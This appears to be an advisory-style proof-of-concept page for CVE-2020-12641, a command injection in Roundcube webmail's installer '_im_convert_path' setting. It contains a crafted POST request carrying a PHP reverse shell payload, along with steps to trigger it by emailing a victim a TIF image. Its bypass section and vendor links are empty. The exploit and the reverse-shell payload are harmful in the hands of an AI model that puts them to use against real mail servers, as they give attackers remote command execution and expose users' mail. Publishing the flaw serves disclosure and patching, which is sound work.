CVE-2020-12641
vulnerability has been found in roundcube webmail up to 1.4.3 (Mail Client Software) and classified as critical. Affected by this vulnerability is some unknown functionality of the file rcube_image.php of the component Config Setting Handler. The manipulation as part of a Shell Metacharacter leads to a argument injection vulnerability. The CWE definition for the vulnerability is CWE-88. The software constructs a string for a command to executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string. As an impact it is known to affect confidentiality, integrity, and availability.
Exploit
Exploiting the vulnerability requires user interaction, which is very unlikely given scenario. Therefore, it will likely not work, but PoC is below.
CVE-2020-12641: Command Injection via “_im_convert_path” in Roundcube Webmail
A Command Injection vulnerability exists in Roundcube versions before 1.4.4, 1.3.11 and 1.2.10. A bypass was also found affecting versions before 1.4.5, 1.3.12. Because the “_im_convert_path” does not perform sanitization/input filtering, an attacker with access to the Roundcube Installer can inject system commands in this parameter that will execute when any user opens any email containing a “non-standard” image.
Bypass:
as mentioned above, the fix for versions 1.4.4, 1.3.11 and 1.2.10 can be bypassed in the following ways:
vendor disclosure:
The vendor’s disclosure and patch of this vulnerability can be found here. The vendor’s disclosure and patch for the bypass can be found here.
Proof Of Concept:
in order to reproduce this vulnerability, the following steps are required:
Craft Injection Request
We craft and send a POST request to the Installer containing the malicious command injection in the “_im_convert_path” parameter:
POST /roundcube/installer/index.php HTTP/1.1
Host: 192.168.243.153
Content-Type: application/x-www-form-urlencoded
Content-Length: 1049
_step=2&_product_name=Roundcube+Webmail&***TRUNCATED***&submit=UPDATE+CONFIG&_im_convert_path=php+-r+'$sock%3dfsockopen("127.0.0.1",4444)%3bexec("/bin/bash+-i+<%263+>%263+2>%263")%3b'+%23NOTE: In this case the parameter contains a PHP reverse shell payload.
Send Email Containing a “Non-standard” Image
we proceed to send to the victim, in this case guest@localhost, an email containing an image of non-standard format (in this case a “tif” format image), which roundcube will try to convert to “jpg” format, thus triggering the above code and sending a reverse shell to the attacker:
Result
If the attack was performed correctly, when the victim opens the mail containing the “TIF” image, a reverse shell will be sent back to the attacker: